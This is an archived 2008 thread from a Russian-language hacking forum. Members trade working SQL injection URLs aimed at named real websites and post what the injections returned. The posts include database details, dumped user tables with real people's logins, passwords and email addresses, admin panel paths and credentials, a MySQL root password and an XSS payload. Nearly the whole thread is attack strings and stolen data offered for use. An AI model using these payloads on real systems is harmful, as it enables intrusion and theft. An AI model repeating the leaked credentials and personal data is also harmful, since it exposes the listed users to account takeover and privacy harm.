ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.01.2008, 13:23
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
RockForLife.org
Код:
http://www.rockforlife.org/action_tellyourprolifestory.php?storyID=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
5.0.45-log:all_onlinebase:aurora@cgi0701.int.bizland.net
Таба login:
Код:
http://www.rockforlife.org/action_tellyourprolifestory.php?storyID=-1+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,user,pass,email),0x71),0x71),3,4,5,6,7,8+from+login+limit+0,1/*
Интересные поля: Данные:
Код:
jmanak:0OKg1sSc:jmanak@all.org
jbrown:0dbW1NDc19vO:jbrown@all.org
dbrandao:l6Scp8vc0eY=:dbrandao@all.org
ewhittington:yuDd2sbZm5+a:Erik@RockForLife.org
peddy:2dLc5g==:Phil@RockForLife.org
blogger:2dLc5g==:jason@digitalstarfire.com
jcatelli:xtvTpJOgmA==:jcatelli@all.org
mhahnenberg:y9bX083Iyd/O:mhahnenberg@all.org
Patrick:3NLV4dfMx9ia:wgott@verizon.net
owmamahateful:0s7No5KalQ==:hatefulproductions@hotmail.com
marysunshine:y87d287I:marysun@catholic.org
RFLCCCD:t9zM3ZWz3tPO:jlcrp@catholicweb.com
RFL Ventura County:y9zb3Mba2uA=:rockforlife87@msn.com
RFL Fayetteville:lZ+fosLVyaGb:rockforlifefay@yahoo.com
nflusche:1c7c5ZKZmKE=:nflusche@all.org
acatelli:xtvTpJOgmA==:acatelli@all.org
tbrock:lp+cptHI2OA=:tbrock@all.org
pbrown:lp+cptHI2OA=:pbrown@all.org
scarroll:lp+cptHI2OA=:scarroll@all.org
kchenault:lp+cptHI2OA=:kchenault@all.org
sclark:lp+cptHI2OA=:sclark@all.org
jcournia:lp+cptHI2OA=:jcournia@all.org
acrane:1c7c5ZKZmKE=:acrane@all.org
fdaub:lp+cptHI2OA=:fdaub@all.org
pdaub:1c7c5ZKZmKE=:pdaub@all.org
aflusche:lp+cptHI2OA=:aflusche@all.org
mhichborn:1c7c5ZKZmKE=:mhichborn@all.org
shopping:0dbd5s3M:shopping@all.org
bhorn:1c7c5ZKZmKE=:bhorn@all.org
rjohnston:lp+cptHI2OA=:rjohnston@all.org
skenney:xt7e28/I2A==:skenney@all.org
lrehman:lp+cptHI2OA=:lrehman@all.org
jsedlak:1c7c5ZKZmKE=:jsedlak@all.org
msedlak:lp+cptHI2OA=:msedlak@all.org
bseers:1c7c5ZKZmKE=:bseers@all.org
dcurrier:ltrY5MbJxs/i:dcurrier@all.org
ltignor:ydfdo5OZmg==:ltignor@all.org
pnowak:lp+cptHI2OA=:pnowak@all.org
Этот сайт - часть от проекта _http://www.all.org (что видно по большинству ящиков!) ,
на котором тоже есть баги... Кто знает, может они крутятся на одном серваке...
|
|
|
24.01.2008, 14:14
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
linux.uta.edu
Код:
http://linux.uta.edu/article.php?pid=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5/*
5.0.22-log:linux:linux@web-4.uta.edu
scaraye.com
Код:
http://www.scaraye.com/article.php?rub=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user())/*&sr=49
4.0.16-standard:my37767:my37767@62.193.203.48
macmerc.com
Код:
http://www.macmerc.com/article.php?sid=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12/*
4.1.20-log:macmerc_nuke:macmerc@209.68.1.202
inthefray.com
Код:
http://www.inthefray.com/html/article.php?sid=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9/*
5.0.24a-standard-log:mpn_itfmag:itfmag@zim.dreamhost.com
В табе mpn_users есть такие поля как:
Код:
name,uname,pass,email,femail,emailpass,user_icq,user_aim,user_yim,user_msnm
|
|
|
|
24.01.2008, 16:22
|
|
Новичок
Регистрация: 16.12.2007
Сообщений: 27
Провел на форуме:
266344
Репутация:
48
|
|
Код HTML:
http://www.smithhomework.us/article.php?sid=999+union+select+1,2,concat_ws(0x3a,database(),user(),version()),4,5,6,7,8/*
4.0.27-standard
jsmith_peanut@localhost
jsmith_website
Код HTML:
http://www.prophecies.us/article.php?sid=9999+union+select+1,2,concat_ws(0x3a,database(),user(),version()),4,5,6,7,8/*
4.1.22-max-log
prophet_site@p3slh097.shr.phx3.secureserver.net
prophet_site |
|
|
|
24.01.2008, 18:08
|
|
Познающий
Регистрация: 06.11.2007
Сообщений: 57
Провел на форуме:
2688963
Репутация:
272
|
|
kino.ru
Код:
http://kino.ru/cinema.php?id=999+union+select+1,2,3,4,5,6,7/*
version() 4.1.22-standard-log ну и срать))
user() u6635_1@localhost
database() u6635_1
users
~950-100 в базе
Код:
http://kino.ru/cinema.php?id=999+union+select+1,2,3,concat(id,%22:%22,login,%22:%22,psswd,%22:%22,email),5,6,7+from+users+limit+0,1000/*
часть из них...
Код:
вид id:login:psswd:email
1:Rattlemouse:purpur:rattlemouse@gmail.com
2:smoker:7924439:sm@kino.ru
3:nvo:angel:nvo0805@yandex.ru
4:xxx:xxx:xxx@xxx.ru
5:natasha:12345:nvo@kino.ru
6:tarkovsky:1234567:1234567
93:time23:230790:nataxa90paw@mail.ru
9:igor:140766:igormikh@rol.ru
10:elvis:4082506:elvis_n@mail.ru
12:stas:130281:forec@yandex.ru
66:strippedhyena:reptile:strippedhyena@mail.ru
13:Ocsana:310373:ocsana@meden.ru
14:kirr:777444:kirkot@yandex.ru
15:Nat:111222:nat@kino.ru
16:Yuliko:ju17011977:oper@metcombank-moscow.ru
17:Demetr:809809:webspider@list.ru
18:groza:250276:nakostina@yandex.ru
19:Belka:555444:finwar@narod.ru
20:TaN4eS:987654:npocmo@inbox.ru
21:Destiny:03090309:destiny-375@yandex.ru
22:horek:453453:polecat@inbox.ru
23:Crazy:250674:m.osipov@it911.ru
24:Kseka:675675:ksekovka@yandex.ru
25:Oksana:999888:oksanastr@yandex.ru
26:Legenda:tatkasparco:legenda@bk.ru
27:CoolBoy:989898:super@mail2k.ru
28:PODvodnik:magistr:vladis@latnet.lv
29:Andrey:897897:am@4a.ru
30:Stelfort:89265834267:setstelfortshow@mail.ru
31:Fedot:fedot128:galakafedor@mail.ru
32:Reaccia:787878:h_happy@mail.ru
34:Misha:543543:mikhail@sutupov.ru
36:Iren:324324:BLA_BLA_BLA@inbox.ru
37:Surik:kirus:surik@renew.ru
38:LUMER:67890:tit-lesha@mail.ru
39:marusenka:234543:blinovnikvy@awax.ru
42:Tjema:111222:vovikovich@yandex.ru
xss
Код:
http://kino.ru/cinema.php?id=999+union+select+1,"<script>alert()</script>",3,4,5,6,7+from+users+limit+0,1000/*
админка
http://kino.ru/admin
сайты на этом сервере (2ip.ru/server)
Код:
www.freeware.ru
www.elephant.ru
www.kino.ru
www.winceware.ru
www.macware.ru
www.unixware.ru
www.palmware.ru
www.download.ware.ru
www.sail.ru
www.old.freeware.ru
www.ware.ru
www.priceware.ru
www.journey.ru
www.inter.su
www.hospital.ru
www.bakalova.ru
www.debil.ru
шелл не лил
passionfordancing.co.uk
Код:
http://www.passionfordancing.co.uk/country.php?rID=100+union+select+1,2,3,4,5,6
version() 5.0.54
user() passionforda@localhost
database() passionforda
Код:
http://www.passionfordancing.co.uk/country.php?rID=100+union+select+1,2,concat(adminid,char(58),password),4,5,6+from+tbladmin+limit+0,100--
админка
Код:
www.passionfordancing.co.uk/admin
allan@ddswebdesign.co.uk:ki11kenny1970
ни в первом, ни во втором случае доступа к mysql.user не получил=//
|
|
|
|
24.01.2008, 22:16
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
www.perfectummobile.com
http://www.perfectummobile.com/index.php?action=news&news_id=-613+union+select+1,concat_ws(0x3a,username,passwor d),3,4,5,6,7,8,9,0,1+from+bsmc.bcms_admins+limit+0 ,1/*
------------------------------------------------------
http://www.perfectummobile.com/index.php?action=news&news_id=-613+union+select+1,concat_ws(0x3a,login,passw),3,4 ,5,6,7,8,9,0,1+from+cms_admins/*
------------------------------------------------------
http://www.perfectummobile.com/index.php?action=news&news_id=-613+union+select+1,concat(user,0x3a,password,0x3a, host),3,4,5,6,7,8,9,0,1+from+mysql.user/*
5.0.26-standard
admin:9af41a03da452b8c2549aff071ed22fe: sayqal
но пасс не катит
cdmadmin:9622f76499e8588addb05838587a8e8f - возможно этот подойдёт - но не расщифровал
http://www.perfectummobile.com/admin/admin
http://www.perfectummobile.com/admin/phpinfo.php
http://www.perfectummobile.com/admin/smarty
|
|
|
|
25.01.2008, 02:46
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
www.games.zbeng.net
http://games.zbeng.net/game.php?id=-8+union+select+concat(username,char(58),password), 2,3,4+from+users+limit+1,10/*
Вывод в тайтле
http://zbeng.net/admin.php- админка
Жаль, что в админке все через ****...(глупый язык=)))
-----------------------------------------------------------------------
www.pfl.com.ua
http://www.pfl.com.ua/game.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27/*
Нашел таблу adm
В табле adm колонка name
Последний раз редактировалось Tigger; 25.01.2008 в 03:24..
|
|
|
|
25.01.2008, 02:57
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
Сообщение от 159932
www.perfectummobile.com
5.0.26-standard
на предыдущей странице этот сайт я выкладывал, cmda.uz ,походу это зеркала 
|
|
|
|
25.01.2008, 03:33
|
|
Познающий
Регистрация: 31.08.2007
Сообщений: 94
Провел на форуме:
422909
Репутация:
200
|
|
Парочка бразильских ресурсов:
http://www.visitadopapa.org.br/pagina.php?id=48+and+1=2+union+all+select+1,concat (user,char(58),password,char(58)),3+from+mysql.use r/*
http://www.visitadopapa.org.br/admin/ (no comments)
root: farofa
http://www.midiasemmascara.com.br/editoria.php?id=8+and+1=2+union+select+concat_ws(0 x3A,usuario,login,permissao),2+from+db_admusers/*
где поля:
usuario - логин
login - пароль
http://www.revistainovacao.uniemp.br/materia.php?id=83+and+1=2+union+select+1,2,3,4,5,6 ,concat_ws(0x3A,nome,login,senha,ativo),8,9,10,11, 12,13,14,15,16,17,18+from+usuario/*
http://www.kaxi.com.br/area.php?id=6+and+1=2+union+select+table_name,2,3+ from+information_schema.tables+limit+20,1/*
Поскольку с бразильским у меня проблемы, а точнее я его совсем не знаю, найти интересную таблицу не удалось, единственное знакомое слово - email ). Хотя наличие "мускула" имеет место.
|
|
|
|
25.01.2008, 15:24
|
|
Новичок
Регистрация: 19.01.2008
Сообщений: 19
Провел на форуме:
71644
Репутация:
11
|
|
_http://www.futureplay.org/news.php?id=999+union+select+1,login,3,user_passwo rd,5,6,7+from+user/*
_http://www.pharm-system.com/index.phtml?page=news&id=-1+union+select+1,2,3,4,5,concat(email,0x3a,passwor d),7,8+from+users/*
|
|
|
|
25.01.2008, 16:10
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
www.game-sector.ru
http://www.game-sector.ru/game.php?id=973+union+select+1,concat_ws(0x2f,vers ion(),user(),database()),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20/*
4.1.22/d8242sa9814@z130.zone.ee/d8242sd5804
-----------------------------------------------------------------------
www.isimulacrum.com
http://www.isimulacrum.com/game.php?gid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
Есть интересные таблы:
Log
Contributors
-----------------------------------------------------------------------
http://www1.redikod.com/www.nordicgameportal.com/game.php?id=-1+union+select+1,2,3,4,concat(username,char(58),pw d),6,7,8,9,10,11,12,13,14,15,16+from+users/*
Есть доступ к mysql.user
-----------------------------------------------------------------------
http://www.isteoyun.com/game.php?id=-1+union+select+1,concat_ws(0x2f,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11/*
5.0.27/root@localhost/isteoyun
Последний раз редактировалось Tigger; 25.01.2008 в 19:05..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
